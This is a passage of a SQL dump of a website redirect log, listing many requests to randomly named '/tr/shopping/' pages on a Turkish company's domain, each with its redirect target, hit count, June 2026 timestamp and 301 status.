00:00:00',301),(67331,'https://3s-technologies.com.tr/tr/shopping/oppugnancy/2393900769.html',NULL,'https://3s-technologies.com.tr/shopping/oppugnancy/2393900769.html','',1,0,'2026-06-10 23:13:20','0000-00-00 00:00:00',301),(67332,'https://3s-technologies.com.tr/tr/shopping/bumbelo/2328628237.html',NULL,'https://3s-technologies.com.tr/shopping/bumbelo/2328628237.html','',1,0,'2026-06-10 23:13:23','0000-00-00 00:00:00',301),(67333,'https://3s-technologies.com.tr/tr/shopping/galvanometric/3333398811.html',NULL,'https://3s-technologies.com.tr/shopping/galvanometric/3333398811.html','',1,0,'2026-06-10 23:13:26','0000-00-00 00:00:00',301),(67334,'https://3s-technologies.com.tr/tr/shopping/faying/555391913.html',NULL,'https://3s-technologies.com.tr/shopping/faying/555391913.html','',1,0,'2026-06-10 23:13:29','0000-00-00 00:00:00',301),(67335,'https://3s-technologies.com.tr/tr/shopping/limestone/3127295269.html',NULL,'https://3s-technologies.com.tr/shopping/limestone/3127295269.html','',1,0,'2026-06-10 23:13:32','0000-00-00 00:00:00',301),(67336,'https://3s-technologies.com.tr/tr/shopping/selfinterest/1858460658.html',NULL,'https://3s-technologies.com.tr/shopping/selfinterest/1858460658.html','',1,0,'2026-06-10 23:13:35','0000-00-00 00:00:00',301),(67337,'https://3s-technologies.com.tr/tr/shopping/avena/1349862678.html',NULL,'https://3s-technologies.com.tr/shopping/avena/1349862678.html','',1,0,'2026-06-10 23:13:38','0000-00-00 00:00:00',301),(67338,'https://3s-technologies.com.tr/tr/shopping/distained/4167563723.html',NULL,'https://3s-technologies.com.tr/shopping/distained/4167563723.html','',1,0,'2026-06-10 23:13:41','0000-00-00 00:00:00',301),(67339,'https://3s-technologies.com.tr/tr/shopping/shakedown/681809902.html',NULL,'https://3s-technologies.com.tr/shopping/shakedown/681809902.html','',1,0,'2026-06-10 23:13:44','0000-00-00 00:00:00',301),(67340,'https://3s-technologies.com.tr/tr/shopping/parmesan/132601108.html',NULL,'https://3s-technologies.com.tr/shopping/parmesan/132601108.html','',1,0,'2026-06-10 23:13:47','0000-00-00 00:00:00',301),(67341,'https://3s-technologies.com.tr/tr/shopping/eupatorium/867044200.html',NULL,'https://3s-technologies.com.tr/shopping/eupatorium/867044200.html','',1,0,'2026-06-10 23:13:50','0000-00-00 00:00:00',301),(67342,'https://3s-technologies.com.tr/tr/shopping/atomicism/3302785710.html',NULL,'https://3s-technologies.com.tr/shopping/atomicism/3302785710.html','',1,0,'2026-06-10 23:13:53','0000-00-00 00:00:00',301),(67343,'https://3s-technologies.com.tr/tr/shopping/catoptromancy/1625896732.html',NULL,'https://3s-technologies.com.tr/shopping/catoptromancy/1625896732.html','',1,0,'2026-06-10 23:13:56','0000-00-00 00:00:00',301),(67344,'https://3s-technologies.com.tr/tr/shopping/redition/2493622589.html',NULL,'https://3s-technologies.com.tr/shopping/redition/2493622589.html','',1,0,'2026-06-10 23:13:59','0000-00-00 00:00:00',301),(67345,'https://3s-technologies.com.tr/tr/shopping/dinting/1411071839.html',NULL,'https://3s-technologies.com.tr/shopping/dinting/1411071839.html','',1,0,'2026-06-10 23:14:02','0000-00-00 00:00:00',301),(67346,'https://3s-technologies.com.tr/tr/shopping/anthracic/3970069261.html',NULL,'https://3s-technologies.com.tr/shopping/anthracic/3970069261.html','',1,0,'2026-06-10 23:14:05','0000-00-00 00:00:00',301),(67347,'https://3s-technologies.com.tr/tr/shopping/incomposedly/686511843.html',NULL,'https://3s-technologies.com.tr/shopping/incomposedly/686511843.html','',1,0,'2026-06-10 23:14:08','0000-00-00 00:00:00',301),(67348,'https://3s-technologies.com.tr/tr/shopping/fatalness/2327675746.html',NULL,'https://3s-technologies.com.tr/shopping/fatalness/2327675746.html','',1,0,'2026-06-10 23:14:11','0000-00-00 00:00:00',301),(67349,'https://3s-technologies.com.tr/tr/shopping/cotland/4012301204.html',NULL,'https://3s-technologies.com.tr/shopping/cotland/4012301204.html','',1,0,'2026-06-10 23:14:16','0000-00-00 00:00:00',301),(67350,'https://3s-technologies.com.tr/tr/shopping/obsequies/4025395744.html',NULL,'https://3s-technologies.com.tr/shopping/obsequies/4025395744.html','',1,0,'2026-06-10 23:14:18','0000-00-00 00:00:00',301),(67351,'https://3s-technologies.com.tr/tr/shopping/dimmest/2183461292.html',NULL,'https://3s-technologies.com.tr/shopping/dimmest/2183461292.html','',1,0,'2026-06-10 23:14:21','0000-00-00 00:00:00',301),(67352,'https://3s-technologies.com.tr/tr/shopping/introreception/3403049972.html',NULL,'https://3s-technologies.com.tr/shopping/introreception/3403049972.html','',1,0,'2026-06-10 23:14:24','0000-00-00 00:00:00',301),(67353,'https://3s-technologies.com.tr/tr/shopping/ithyphallic/1089783449.html',NULL,'https://3s-technologies.com.tr/shopping/ithyphallic/1089783449.html','',1,0,'2026-06-10 23:14:27','0000-00-00 00:00:00',301),(67354,'https://3s-technologies.com.tr/tr/shopping/manless/1531460695.html',NULL,'https://3s-technologies.com.tr/shopping/manless/1531460695.html','',1,0,'2026-06-10 23:14:30','0000-00-00 00:00:00',301),(67355,'https://3s-technologies.com.tr/tr/shopping/chattering/516510605.html',NULL,'https://3s-technologies.com.tr/shopping/chattering/516510605.html','',1,0,'2026-06-10 23:14:33','0000-00-00 00:00:00',301),(67356,'https://3s-technologies.com.tr/tr/shopping/evangile/207282500.html',NULL,'https://3s-technologies.com.tr/shopping/evangile/207282500.html','',1,0,'2026-06-10 23:14:36','0000-00-00 00:00:00',301),(67357,'https://3s-technologies.com.tr/tr/shopping/quelling/2412976771.html',NULL,'https://3s-technologies.com.tr/shopping/quelling/2412976771.html','',1,0,'2026-06-10 23:14:39','0000-00-00 00:00:00',301),(67358,'https://3s-technologies.com.tr/tr/shopping/preened/2595883959.html',NULL,'https://3s-technologies.com.tr/shopping/preened/2595883959.html','',1,0,'2026-06-10 23:14:42','0000-00-00 00:00:00',301),(67359,'https://3s-technologies.com.tr/tr/shopping/athyriaceae/3323680976.html',NULL,'https://3s-technologies.com.tr/shopping/athyriaceae/3323680976.html','',1,0,'2026-06-10 23:14:45','0000-00-00 00:00:00',301),(67360,'https://3s-technologies.com.tr/tr/shopping/sourer/4122789451.html',NULL,'https://3s-technologies.com.tr/shopping/sourer/4122789451.html','',1,0,'2026-06-10 23:14:48','0000-00-00 00:00:00',301),(67361,'https://3s-technologies.com.tr/tr/shopping/zoologies/3352474829.html',NULL,'https://3s-technologies.com.tr/shopping/zoologies/3352474829.html','',1,0,'2026-06-10 23:14:51','0000-00-00 00:00:00',301),(67362,'https://3s-technologies.com.tr/tr/shopping/batteau/394844943.html',NULL,'https://3s-technologies.com.tr/shopping/batteau/394844943.html','',1,0,'2026-06-10 23:14:54','0000-00-00 00:00:00',301),(67363,'https://3s-technologies.com.tr/tr/shopping/verticle/2411764688.html',NULL,'https://3s-technologies.com.tr/shopping/verticle/2411764688.html','',1,0,'2026-06-10 23:14:57','0000-00-00 00:00:00',301),(67364,'https://3s-technologies.com.tr/tr/shopping/pavilion/338289277.html',NULL,'https://3s-technologies.com.tr/shopping/pavilion/338289277.html','',1,0,'2026-06-10 23:14:59','0000-00-00 00:00:00',301),(67365,'https://3s-technologies.com.tr/tr/shopping/describing/452596595.html',NULL,'https://3s-technologies.com.tr/shopping/describing/452596595.html','',1,0,'2026-06-10 23:15:03','0000-00-00 00:00:00',301),(67366,'https://3s-technologies.com.tr/tr/shopping/buckbasket/280569974.html',NULL,'https://3s-technologies.com.tr/shopping/buckbasket/280569974.html','',1,0,'2026-06-10 23:15:06','0000-00-00 00:00:00',301),(67367,'https://3s-technologies.com.tr/tr/shopping/leaving/3206464434.html',NULL,'https://3s-technologies.com.tr/shopping/leaving/3206464434.html','',1,0,'2026-06-10 23:15:09','0000-00-00 00:00:00',301),(67368,'https://3s-technologies.com.tr/tr/shopping/frippery/2431986354.html',NULL,'https://3s-technologies.com.tr/shopping/frippery/2431986354.html','',1,0,'2026-06-10 23:15:12','0000-00-00 00:00:00',301),(67369,'https://3s-technologies.com.tr/tr/shopping/encephalon/4132754783.html',NULL,'https://3s-technologies.com.tr/shopping/encephalon/4132754783.html','',1,0,'2026-06-10 23:15:15','0000-00-00 00:00:00',301),(67370,'https://3s-technologies.com.tr/tr/shopping/oxidulated/3345181176.html',NULL,'https://3s-technologies.com.tr/shopping/oxidulated/3345181176.html','',1,0,'2026-06-10 23:15:18','0000-00-00 00:00:00',301),(67371,'https://3s-technologies.com.tr/tr/shopping/frisian/246973149.html',NULL,'https://3s-technologies.com.tr/shopping/frisian/246973149.html','',1,0,'2026-06-10 23:15:23','0000-00-00 00:00:00',301),(67372,'https://3s-technologies.com.tr/tr/shopping/annelida/2001462997.html',NULL,'https://3s-technologies.com.tr/shopping/annelida/2001462997.html','',1,0,'2026-06-10 23:15:27','0000-00-00 00:00:00',301),(67373,'https://3s-technologies.com.tr/tr/shopping/valvulae/3540923296.html',NULL,'https://3s-technologies.com.tr/shopping/valvulae/3540923296.html','',1,0,'2026-06-10 23:15:30','0000-00-00 00:00:00',301),(67374,'https://3s-technologies.com.tr/tr/shopping/collyrium/4242030899.html',NULL,'https://3s-technologies.com.tr/shopping/collyrium/4242030899.html','',1,0,'2026-06-10 23:15:33','0000-00-00 00:00:00',301),(67375,'https://3s-technologies.com.tr/tr/shopping/checky/3354522275.html',NULL,'https://3s-technologies.com.tr/shopping/checky/3354522275.html','',1,0,'2026-06-10 23:15:36','0000-00-00 00:00:00',301),(67376,'https://3s-technologies.com.tr/tr/shopping/masseteric/1218315658.html',NULL,'https://3s-technologies.com.tr/shopping/masseteric/1218315658.html','',1,0,'2026-06-10 23:15:39','0000-00-00 00:00:00',301),(67377,'https://3s-technologies.com.tr/tr/shopping/insatiably/136192013.html',NULL,'https://3s-technologies.com.tr/shopping/insatiably/136192013.html','',1,0,'2026-06-10 23:15:42','0000-00-00 00:00:00',301),(67378,'https://3s-technologies.com.tr/tr/shopping/perciform/2624578980.html',NULL,'https://3s-technologies.com.tr/shopping/perciform/2624578980.html','',1,0,'2026-06-10 23:15:45','0000-00-00 00:00:00',301),(67379,'https://3s-technologies.com.tr/tr/shopping/escaped/1167740499.html',NULL,'https://3s-technologies.com.tr/shopping/escaped/1167740499.html','',1,0,'2026-06-10 23:15:48','0000-00-00 00:00:00',301),(67380,'https://3s-technologies.com.tr/tr/shopping/loiteringly/3657375937.html',NULL,'https://3s-technologies.com.tr/shopping/loiteringly/3657375937.html','',1,0,'2026-06-10 23:15:51','0000-00-00 00:00:00',301),(67381,'https://3s-technologies.com.tr/tr/shopping/hummum/810342111.html',NULL,'https://3s-technologies.com.tr/shopping/hummum/810342111.html','',1,0,'2026-06-10 23:15:54','0000-00-00 00:00:00',301),(67382,'https://3s-technologies.com.tr/tr/shopping/thymol/3544840228.html',NULL,'https://3s-technologies.com.tr/shopping/thymol/3544840228.html','',1,0,'2026-06-10 23:15:57','0000-00-00 00:00:00',301),(67383,'https://3s-technologies.com.tr/tr/shopping/automorphism/1905723819.html',NULL,'https://3s-technologies.com.tr/shopping/automorphism/1905723819.html','',1,0,'2026-06-10 23:16:00','0000-00-00 00:00:00',301),(67384,'https://3s-technologies.com.tr/tr/shopping/lanarius/1359057338.html',NULL,'https://3s-technologies.com.tr/shopping/lanarius/1359057338.html','',1,0,'2026-06-10 23:16:03','0000-00-00 00:00:00',301),(67385,'https://3s-technologies.com.tr/tr/shopping/rickets/2629331307.html',NULL,'https://3s-technologies.com.tr/shopping/rickets/2629331307.html','',1,0,'2026-06-10 23:16:06','0000-00-00 00:00:00',301),(67386,'https://3s-technologies.com.tr/tr/shopping/sunburnt/115966372.html',NULL,'https://3s-technologies.com.tr/shopping/sunburnt/115966372.html','',1,0,'2026-06-10 23:16:09','0000-00-00 00:00:00',301),(67387,'https://3s-technologies.com.tr/tr/shopping/sprunt/3762154010.html',NULL,'https://3s-technologies.com.tr/shopping/sprunt/3762154010.html','',1,0,'2026-06-10 23:16:16','0000-00-00 00:00:00',301),(67388,'https://3s-technologies.com.tr/tr/shopping/grateful/821435568.html',NULL,'https://3s-technologies.com.tr/shopping/grateful/821435568.html','',1,0,'2026-06-10 23:16:18','0000-00-00 00:00:00',301),(67389,'https://3s-technologies.com.tr/tr/shopping/suffragated/3877804585.html',NULL,'https://3s-technologies.com.tr/shopping/suffragated/3877804585.html','',1,0,'2026-06-10 23:16:21','0000-00-00 00:00:00',301),(67390,'https://3s-technologies.com.tr/tr/shopping/necessaries/454874370.html',NULL,'https://3s-technologies.com.tr/shopping/necessaries/454874370.html','',1,0,'2026-06-10 23:16:24','0000-00-00 00:00:00',301),(67391,'https://3s-technologies.com.tr/tr/shopping/lobby/627694515.html',NULL,'https://3s-technologies.com.tr/shopping/lobby/627694515.html','',1,0,'2026-06-10 23:16:27','0000-00-00 00:00:00',301),(67392,'https://3s-technologies.com.tr/tr/shopping/tringoides/4019594841.html',NULL,'https://3s-technologies.com.tr/shopping/tringoides/4019594841.html','',1,0,'2026-06-10 23:16:30','0000-00-00 00:00:00',301),(67393,'https://3s-technologies.com.tr/tr/shopping/introspection/738430243.html',NULL,'https://3s-technologies.com.tr/shopping/introspection/738430243.html','',1,0,'2026-06-10 23:16:33','0000-00-00 00:00:00',301),(67394,'https://3s-technologies.com.tr/tr/shopping/chekmak/3061297489.html',NULL,'https://3s-technologies.com.tr/shopping/chekmak/3061297489.html','',1,0,'2026-06-10 23:16:36','0000-00-00 00:00:00',301),(67395,'https://3s-technologies.com.tr/tr/shopping/fictor/320377735.html',NULL,'https://3s-technologies.com.tr/shopping/fictor/320377735.html','',1,0,'2026-06-10 23:16:39','0000-00-00 00:00:00',301),(67396,'https://3s-technologies.com.tr/tr/shopping/caveator/2383347555.html',NULL,'https://3s-technologies.com.tr/shopping/caveator/2383347555.html','',1,0,'2026-06-10 23:16:42','0000-00-00 00:00:00',301),(67397,'https://3s-technologies.com.tr/tr/shopping/torso/2220662049.html',NULL,'https://3s-technologies.com.tr/shopping/torso/2220662049.html','',1,0,'2026-06-10 23:16:45','0000-00-00 00:00:00',301),(67398,'https://3s-technologies.com.tr/tr/shopping/instillatory/155268031.html',NULL,'https://3s-technologies.com.tr/shopping/instillatory/155268031.html','',1,0,'2026-06-10 23:16:48','0000-00-00 00:00:00',301),(67399,'https://3s-technologies.com.tr/tr/shopping/hypercarbureted/3149844077.html',NULL,'https://3s-technologies.com.tr/shopping/hypercarbureted/3149844077.html','',1,0,'2026-06-10 23:16:51','0000-00-00 00:00:00',301),(67400,'https://3s-technologies.com.tr/tr/shopping/impendent/3942703467.html',NULL,'https://3s-technologies.com.tr/shopping/impendent/3942703467.html','',1,0,'2026-06-10 23:16:57','0000-00-00 00:00:00',301),(67401,'https://3s-technologies.com.tr/tr/shopping/fortlet/153775281.html',NULL,'https://3s-technologies.com.tr/shopping/fortlet/153775281.html','',1,0,'2026-06-10 23:17:02','0000-00-00 00:00:00',301),(67402,'https://3s-technologies.com.tr/tr/shopping/roomth/3135537454.html',NULL,'https://3s-technologies.com.tr/shopping/roomth/3135537454.html','',1,0,'2026-06-10 23:17:05','0000-00-00 00:00:00',301),(67403,'https://3s-technologies.com.tr/tr/shopping/disengaged/568222870.html',NULL,'https://3s-technologies.com.tr/shopping/disengaged/568222870.html','',1,0,'2026-06-10 23:17:08','0000-00-00 00:00:00',301),(67404,'https://3s-technologies.com.tr/tr/shopping/picard/2944501266.html',NULL,'https://3s-technologies.com.tr/shopping/picard/2944501266.html','',1,0,'2026-06-10 23:17:11','0000-00-00 00:00:00',301),(67405,'https://3s-technologies.com.tr/tr/shopping/pointblank/2838191790.html',NULL,'https://3s-technologies.com.tr/shopping/pointblank/2838191790.html','',1,0,'2026-06-10 23:17:14','0000-00-00 00:00:00',301),(67406,'https://3s-technologies.com.tr/tr/shopping/normally/523687098.html',NULL,'https://3s-technologies.com.tr/shopping/normally/523687098.html','',1,0,'2026-06-10 23:17:17','0000-00-00 00:00:00',301),(67407,'https://3s-technologies.com.tr/tr/shopping/policeman/3573418121.html',NULL,'https://3s-technologies.com.tr/shopping/policeman/3573418121.html','',1,0,'2026-06-10 23:17:20','0000-00-00 00:00:00',301),(67408,'https://3s-technologies.com.tr/tr/shopping/parallelogrammic/3450540360.html',NULL,'https://3s-technologies.com.tr/shopping/parallelogrammic/3450540360.html','',1,0,'2026-06-10 23:17:23','0000-00-00 00:00:00',301),(67409,'https://3s-technologies.com.tr/tr/shopping/demonographer/2222037655.html',NULL,'https://3s-technologies.com.tr/shopping/demonographer/2222037655.html','',1,0,'2026-06-10 23:17:26','0000-00-00 00:00:00',301),(67410,'https://3s-technologies.com.tr/tr/shopping/incuriousness/4030362255.html',NULL,'https://3s-technologies.com.tr/shopping/incuriousness/4030362255.html','',1,0,'2026-06-10 23:17:29','0000-00-00 00:00:00',301),(67411,'https://3s-technologies.com.tr/tr/shopping/potcher/3013871792.html',NULL,'https://3s-technologies.com.tr/shopping/potcher/3013871792.html','',1,0,'2026-06-10 23:17:32','0000-00-00 00:00:00',301),(67412,'https://3s-technologies.com.tr/tr/shopping/healingly/3015083875.html',NULL,'https://3s-technologies.com.tr/shopping/healingly/3015083875.html','',1,0,'2026-06-10 23:17:37','0000-00-00 00:00:00',301),(67413,'https://3s-technologies.com.tr/tr/shopping/dreamlessly/2623366897.html',NULL,'https://3s-technologies.com.tr/shopping/dreamlessly/2623366897.html','',1,0,'2026-06-10 23:17:41','0000-00-00 00:00:00',301),(67414,'https://3s-technologies.com.tr/tr/shopping/damnification/1849002431.html',NULL,'https://3s-technologies.com.tr/shopping/damnification/1849002431.html','',1,0,'2026-06-10 23:17:44','0000-00-00 00:00:00',301),(67415,'https://3s-technologies.com.tr/tr/shopping/certificate/3726649391.html',NULL,'https://3s-technologies.com.tr/shopping/certificate/3726649391.html','',1,0,'2026-06-10 23:17:47','0000-00-00 00:00:00',301),(67416,'https://3s-technologies.com.tr/tr/shopping/humblehead/212034827.html',NULL,'https://3s-technologies.com.tr/shopping/humblehead/212034827.html','',1,0,'2026-06-10 23:17:50','0000-00-00 00:00:00',301),(67417,'https://3s-technologies.com.tr/tr/shopping/bottlenose/1838777475.html',NULL,'https://3s-technologies.com.tr/shopping/bottlenose/1838777475.html','',1,0,'2026-06-10 23:17:53','0000-00-00 00:00:00',301),(67418,'https://3s-technologies.com.tr/tr/shopping/cogent/1153416792.html',NULL,'https://3s-technologies.com.tr/shopping/cogent/1153416792.html','',1,0,'2026-06-10 23:17:56','0000-00-00 00:00:00',301),(67419,'https://3s-technologies.com.tr/tr/shopping/fudder/2448457567.html',NULL,'https://3s-technologies.com.tr/shopping/fudder/2448457567.html','',1,0,'2026-06-10 23:17:59','0000-00-00 00:00:00',301),(67420,'https://3s-technologies.com.tr/tr/shopping/whetted/3863334439.html',NULL,'https://3s-technologies.com.tr/shopping/whetted/3863334439.html','',1,0,'2026-06-10 23:18:02','0000-00-00 00:00:00',301),(67421,'https://3s-technologies.com.tr/tr/shopping/kamet/2736209295.html',NULL,'https://3s-technologies.com.tr/shopping/kamet/2736209295.html','',1,0,'2026-06-10 23:18:05','0000-00-00 00:00:00',301),(67422,'https://3s-technologies.com.tr/tr/shopping/hemostatic/3740855970.html',NULL,'https://3s-technologies.com.tr/shopping/hemostatic/3740855970.html','',1,0,'2026-06-10 23:18:08','0000-00-00 00:00:00',301),(67423,'https://3s-technologies.com.tr/tr/shopping/fraised/263721054.html',NULL,'https://3s-technologies.com.tr/shopping/fraised/263721054.html','',1,0,'2026-06-10 23:18:11','0000-00-00 00:00:00',301),(67424,'https://3s-technologies.com.tr/tr/shopping/bagrina/774844231.html',NULL,'https://3s-technologies.com.tr/shopping/bagrina/774844231.html','',1,0,'2026-06-10 23:18:14','0000-00-00 00:00:00',301),(67425,'https://3s-technologies.com.tr/tr/shopping/superinspect/936922620.html',NULL,'https://3s-technologies.com.tr/shopping/superinspect/936922620.html','',1,0,'2026-06-10 23:18:17','0000-00-00 00:00:00',301),(67426,'https://3s-technologies.com.tr/tr/shopping/batswing/668714375.html',NULL,'https://3s-technologies.com.tr/shopping/batswing/668714375.html','',1,0,'2026-06-10 23:18:20','0000-00-00 00:00:00',301),(67427,'https://3s-technologies.com.tr/tr/shopping/batta/2079502798.html',NULL,'https://3s-technologies.com.tr/shopping/batta/2079502798.html','',1,0,'2026-06-10 23:18:23','0000-00-00 00:00:00',301),(67428,'https://3s-technologies.com.tr/tr/shopping/arquebuse/3515439226.html',NULL,'https://3s-technologies.com.tr/shopping/arquebuse/3515439226.html','',1,0,'2026-06-10 23:18:26','0000-00-00 00:00:00',301),(67429,'https://3s-technologies.com.tr/tr/shopping/sacciform/1197141517.html',NULL,'https://3s-technologies.com.tr/shopping/sacciform/1197141517.html','',1,0,'2026-06-10 23:18:29','0000-00-00 00:00:00',301),(67430,'https://3s-technologies.com.tr/tr/shopping/slacken/2542884602.html',NULL,'https://3s-technologies.com.tr/shopping/slacken/2542884602.html','',1,0,'2026-06-10 23:18:32','0000-00-00 00:00:00',301),(67431,'https://3s-technologies.com.tr/tr/shopping/cheapen/369080238.html',NULL,'https://3s-technologies.com.tr/shopping/cheapen/369080238.html','',1,0,'2026-06-10 23:18:35','0000-00-00 00:00:00',301),(67432,'https://3s-technologies.com.tr/tr/shopping/anathematize/3474140491.html',NULL,'https://3s-technologies.com.tr/shopping/anathematize/3474140491.html','',1,0,'2026-06-10 23:18:38','0000-00-00 00:00:00',301),(67433,'https://3s-technologies.com.tr/tr/shopping/polyarchist/2260352666.html',NULL,'https://3s-technologies.com.tr/shopping/polyarchist/2260352666.html','',1,0,'2026-06-10 23:18:41','0000-00-00 00:00:00',301),(67434,'https://3s-technologies.com.tr/tr/shopping/cicurate/2189262163.html',NULL,'https://3s-technologies.com.tr/shopping/cicurate/2189262163.html','',1,0,'2026-06-10 23:18:44','0000-00-00 00:00:00',301),(67435,'https://3s-technologies.com.tr/tr/shopping/figment/3289954753.html',NULL,'https://3s-technologies.com.tr/shopping/figment/3289954753.html','',1,0,'2026-06-10 23:18:47','0000-00-00 00:00:00',301),(67436,'https://3s-technologies.com.tr/tr/shopping/monophyletic/687723942.html',NULL,'https://3s-technologies.com.tr/shopping/monophyletic/687723942.html','',1,0,'2026-06-10 23:18:50','0000-00-00 00:00:00',301),(67437,'http://3s-technologies.com.tr/tr/shopping/creamfaced/3253909074.html',NULL,'','',1,0,'2026-06-10 23:18:53','0000-00-00 00:00:00',301),(67438,'https://3s-technologies.com.tr/tr/shopping/spotted/972566923.html',NULL,'https://3s-technologies.com.tr/shopping/spotted/972566923.html','',1,0,'2026-06-10 23:18:58','0000-00-00 00:00:00',301),(67439,'https://3s-technologies.com.tr/tr/shopping/morgay/421983494.html',NULL,'https://3s-technologies.com.tr/shopping/morgay/421983494.html','',1,0,'2026-06-10 23:19:00','0000-00-00 00:00:00',301),(67440,'https://3s-technologies.com.tr/tr/shopping/dysgenic/3142831075.html',NULL,'https://3s-technologies.com.tr/shopping/dysgenic/3142831075.html','',1,0,'2026-06-10 23:19:03','0000-00-00 00:00:00',301),(67441,'https://3s-technologies.com.tr/tr/shopping/asiphonea/2906577428.html',NULL,'https://3s-technologies.com.tr/shopping/asiphonea/2906577428.html','',1,0,'2026-06-10 23:19:06','0000-00-00 00:00:00',301),(67442,'https://3s-technologies.com.tr/tr/shopping/dermatopathic/992250074.html',NULL,'https://3s-technologies.com.tr/shopping/dermatopathic/992250074.html','',1,0,'2026-06-10 23:19:09','0000-00-00 00:00:00',301),(67443,'https://3s-technologies.com.tr/tr/shopping/ethical/3859794227.html',NULL,'https://3s-technologies.com.tr/shopping/ethical/3859794227.html','',1,0,'2026-06-10 23:19:12','0000-00-00 00:00:00',301),(67444,'https://3s-technologies.com.tr/tr/shopping/lyceums/2434150944.html',NULL,'https://3s-technologies.com.tr/shopping/lyceums/2434150944.html','',1,0,'2026-06-10 23:19:15','0000-00-00 00:00:00',301),(67445,'http://3s-technologies.com.tr/tr/shopping/cardsharp/2193746323.html',NULL,'','',1,0,'2026-06-10 23:19:17','0000-00-00 00:00:00',301),(67446,'https://3s-technologies.com.tr/tr/shopping/macrocosm/1388458340.html',NULL,'https://3s-technologies.com.tr/shopping/macrocosm/1388458340.html','',1,0,'2026-06-10 23:19:18','0000-00-00 00:00:00',301),(67447,'https://3s-technologies.com.tr/tr/shopping/outspread/1330426021.html',NULL,'https://3s-technologies.com.tr/shopping/outspread/1330426021.html','',1,0,'2026-06-10 23:19:21','0000-00-00 00:00:00',301),(67448,'https://3s-technologies.com.tr/tr/shopping/soundly/3219722481.html',NULL,'https://3s-technologies.com.tr/shopping/soundly/3219722481.html','',1,0,'2026-06-10 23:19:24','0000-00-00 00:00:00',301),(67449,'http://3s-technologies.com.tr/tr/shopping/sphenostoma/537046630.html',NULL,'','',2,0,'2026-06-10 23:19:25','0000-00-00 00:00:00',301),(67450,'https://3s-technologies.com.tr/tr/shopping/lovesick/1882058997.html',NULL,'https://3s-technologies.com.tr/shopping/lovesick/1882058997.html','',1,0,'2026-06-10 23:19:27','0000-00-00 00:00:00',301),(67451,'https://3s-technologies.com.tr/tr/shopping/divisibility/1308465095.html',NULL,'https://3s-technologies.com.tr/shopping/divisibility/1308465095.html','',1,0,'2026-06-10 23:19:30','0000-00-00 00:00:00',301),(67452,'https://3s-technologies.com.tr/tr/shopping/frolicked/2603177612.html',NULL,'https://3s-technologies.com.tr/shopping/frolicked/2603177612.html','',1,0,'2026-06-10 23:19:33','0000-00-00 00:00:00',301),(67453,'https://3s-technologies.com.tr/tr/shopping/calcium/1292782866.html',NULL,'https://3s-technologies.com.tr/shopping/calcium/1292782866.html','',1,0,'2026-06-10 23:19:36','0000-00-00 00:00:00',301),(67454,'http://3s-technologies.com.tr/tr/shopping/sanguinary/511142718.html',NULL,'','',1,0,'2026-06-10 23:19:36','0000-00-00 00:00:00',301),(67455,'https://3s-technologies.com.tr/tr/shopping/iridious/446795724.html',NULL,'https://3s-technologies.com.tr/shopping/iridious/446795724.html','',1,0,'2026-06-10 23:19:39','0000-00-00 00:00:00',301),(67456,'https://3s-technologies.com.tr/tr/shopping/beggarly/818847831.html',NULL,'https://3s-technologies.com.tr/shopping/beggarly/818847831.html','',1,0,'2026-06-10 23:19:42','0000-00-00 00:00:00',301),(67457,'https://3s-technologies.com.tr/tr/shopping/charivari/2951514252.html',NULL,'https://3s-technologies.com.tr/shopping/charivari/2951514252.html','',1,0,'2026-06-10 23:19:45','0000-00-00 00:00:00',301),(67458,'https://3s-technologies.com.tr/tr/shopping/infamy/1249092282.html',NULL,'https://3s-technologies.com.tr/shopping/infamy/1249092282.html','',1,0,'2026-06-10 23:19:50','0000-00-00 00:00:00',301),(67459,'http://3s-technologies.com.tr/tr/shopping/ditionary/1706991631.html',NULL,'','',1,0,'2026-06-10 23:19:51','0000-00-00 00:00:00',301),(67460,'https://3s-technologies.com.tr/tr/shopping/dessert/1956526205.html',NULL,'https://3s-technologies.com.tr/shopping/dessert/1956526205.html','',1,0,'2026-06-10 23:19:53','0000-00-00 00:00:00',301),(67461,'https://3s-technologies.com.tr/tr/shopping/ravager/2699891392.html',NULL,'https://3s-technologies.com.tr/shopping/ravager/2699891392.html','',1,0,'2026-06-10 23:19:55','0000-00-00 00:00:00',301),(67462,'https://3s-technologies.com.tr/tr/shopping/fodientia/3988029265.html',NULL,'https://3s-technologies.com.tr/shopping/fodientia/3988029265.html','',1,0,'2026-06-10 23:19:58','0000-00-00 00:00:00',301),(67463,'https://3s-technologies.com.tr/tr/shopping/damaskin/515181378.html',NULL,'https://3s-technologies.com.tr/shopping/damaskin/515181378.html','',1,0,'2026-06-10 23:20:02','0000-00-00 00:00:00',301),(67464,'https://3s-technologies.com.tr/tr/shopping/dulleyed/889938350.html',NULL,'https://3s-technologies.com.tr/shopping/dulleyed/889938350.html','',1,0,'2026-06-10 23:20:04','0000-00-00 00:00:00',301),(67465,'https://3s-technologies.com.tr/tr/shopping/ingloriously/3078997885.html',NULL,'https://3s-technologies.com.tr/shopping/ingloriously/3078997885.html','',1,0,'2026-06-10 23:20:07','0000-00-00 00:00:00',301),(67466,'https://3s-technologies.com.tr/tr/shopping/locule/2029813679.html',NULL,'https://3s-technologies.com.tr/shopping/locule/2029813679.html','',1,0,'2026-06-10 23:20:11','0000-00-00 00:00:00',301),(67467,'https://3s-technologies.com.tr/tr/shopping/tenpounder/258855558.html',NULL,'https://3s-technologies.com.tr/shopping/tenpounder/258855558.html','',1,0,'2026-06-10 23:20:14','0000-00-00 00:00:00',301),(67468,'https://3s-technologies.com.tr/tr/shopping/oversee/1709818192.html',NULL,'https://3s-technologies.com.tr/shopping/oversee/1709818192.html','',1,0,'2026-06-10 23:20:16','0000-00-00 00:00:00',301),(67469,'http://3s-technologies.com.tr/tr/shopping/grayback/1086810465.html',NULL,'','',1,0,'2026-06-10 23:20:19','0000-00-00 00:00:00',301),(67470,'https://3s-technologies.com.tr/tr/shopping/remitment/269476517.html',NULL,'https://3s-technologies.com.tr/shopping/remitment/269476517.html','',1,0,'2026-06-10 23:20:20','0000-00-00 00:00:00',301),(67471,'https://3s-technologies.com.tr/tr/shopping/conjurator/3799797197.html',NULL,'https://3s-technologies.com.tr/shopping/conjurator/3799797197.html','',1,0,'2026-06-10 23:20:23','0000-00-00 00:00:00',301),(67472,'https://3s-technologies.com.tr/tr/shopping/bivalved/2111574508.html',NULL,'https://3s-technologies.com.tr/shopping/bivalved/2111574508.html','',1,0,'2026-06-10 23:20:26','0000-00-00 00:00:00',301),(67473,'https://3s-technologies.com.tr/tr/shopping/longlegs/940677016.html',NULL,'https://3s-technologies.com.tr/shopping/longlegs/940677016.html','',1,0,'2026-06-10 23:20:29','0000-00-00 